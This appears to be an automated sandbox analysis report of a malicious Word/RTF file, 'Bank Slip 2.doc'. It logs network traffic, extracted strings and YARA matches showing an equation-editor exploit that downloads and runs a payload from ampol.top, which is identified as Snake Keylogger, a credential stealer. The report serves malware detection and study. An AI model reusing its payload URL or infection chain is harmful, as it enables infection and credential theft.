            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeDNS query: name: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /FcdBUj68lnCbMtB.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ampol.topConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49165 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{57BE0F5E-0BF5-4CE6-96F3-B3AC962F851D}.tmpJump to behavior
            Source: global trafficHTTP traffic detected: GET /FcdBUj68lnCbMtB.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ampol.topConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: ampol.top
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: obie8920193.exe, 00000007.00000002.864677424.0000000002367000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002392000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023CE000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000022D4000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002385000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002374000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: obie8920193.exe, 00000007.00000002.864677424.00000000022C5000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002367000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002392000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023CE000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000022D4000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002385000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002374000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023C0000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023A0000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: obie8920193.exe, 00000007.00000002.865491806.0000000005884000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: obie8920193.exe, 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.865491806.0000000005870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe.2.dr, FcdBUj68lnCbMtB[1].exe.2.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe.2.dr, FcdBUj68lnCbMtB[1].exe.2.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.865491806.0000000005870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.354581271.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe.2.dr, FcdBUj68lnCbMtB[1].exe.2.drString found in binary or memory: http://ocsp.comodoca.com0
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: obie8920193.exe, 00000007.00000002.864677424.0000000002367000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002392000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023CE000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002385000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002374000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000022EC000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: obie8920193.exe, 00000005.00000002.366421408.0000000002571000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: obie8920193.exe.2.dr, FcdBUj68lnCbMtB[1].exe.2.drString found in binary or memory: http://www.opcom.ro/rapoarte/export_csv_raportPIPsiVolumTranzactionat_PI.php?zi=
            Source: obie8920193.exe.2.dr, FcdBUj68lnCbMtB[1].exe.2.drString found in binary or memory: http://www.opcom.ro/rapoarte/export_xml_PIPsiVolTranPI.php?zi=
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.00000000005FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ampol.top/
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ampol.top/FcdBUj68lnCbMtB.exe
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ampol.top/FcdBUj68lnCbMtB.exej
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ampol.top/FcdBUj68lnCbMtB.exettC:
            Source: obie8920193.exe, 00000007.00000002.864677424.0000000002367000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002392000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023CE000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000022D4000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002385000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002374000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023C0000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: obie8920193.exe, 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000022D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: obie8920193.exe, 00000007.00000002.864677424.0000000002317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
            Source: obie8920193.exe, 00000007.00000002.864677424.0000000002367000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002392000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023CE000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002385000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002374000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023C0000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.334
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: EQNEDT32.EXE, 00000002.00000002.354913231.0000000004379000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.354581271.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe.2.dr, FcdBUj68lnCbMtB[1].exe.2.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
            Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
            Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
            Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
            Source: unknownHTTPS traffic detected: 104.21.53.203:443 -> 192.168.2.22:49163 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: Bank Slip 2.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: 5.2.obie8920193.exe.3599d70.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.2.obie8920193.exe.3599d70.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.obie8920193.exe.3599d70.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 5.2.obie8920193.exe.3599d70.8.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 5.2.obie8920193.exe.3579550.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.2.obie8920193.exe.3579550.10.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.obie8920193.exe.3579550.10.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 5.2.obie8920193.exe.3579550.10.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 7.2.obie8920193.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 7.2.obie8920193.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 7.2.obie8920193.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 7.2.obie8920193.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 5.2.obie8920193.exe.3579550.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.2.obie8920193.exe.3579550.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.obie8920193.exe.3579550.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 5.2.obie8920193.exe.3579550.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: obie8920193.exe PID: 3152, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: obie8920193.exe PID: 3152, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: obie8920193.exe PID: 3244, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: obie8920193.exe PID: 3244, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Office equation editor drops PE file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\obie8920193.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\FcdBUj68lnCbMtB[1].exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess Stats: CPU usage > 49%
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 5_2_001C1C585_2_001C1C58
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 5_2_002605E05_2_002605E0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 5_2_0026F0C85_2_0026F0C8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 5_2_002612C95_2_002612C9
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 5_2_0026E3705_2_0026E370
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 5_2_0026E7A85_2_0026E7A8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 5_2_0026E7985_2_0026E798
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 5_2_0026FA605_2_0026FA60
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 5_2_0026FA705_2_0026FA70
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 5_2_0026EC905_2_0026EC90
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_003C50387_2_003C5038
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_003C30557_2_003C3055
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_003C38917_2_003C3891
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_003C78C17_2_003C78C1
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_003C41307_2_003C4130
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_003C29107_2_003C2910
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_003CD1D87_2_003CD1D8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_003C8A197_2_003C8A19
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_003C5B187_2_003C5B18
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_003C3B727_2_003C3B72
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_003C2BF17_2_003C2BF1
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_003C844A7_2_003C844A
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_003C35B07_2_003C35B0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_003C3E507_2_003C3E50
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_003CC7507_2_003CC750
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_003C67407_2_003C6740
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_003C70007_2_003C7000
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_003C6BA07_2_003C6BA0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_003C74607_2_003C7460
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_003CC7407_2_003CC740
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_003CBFBA7_2_003CBFBA
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_003CBFC87_2_003CBFC8
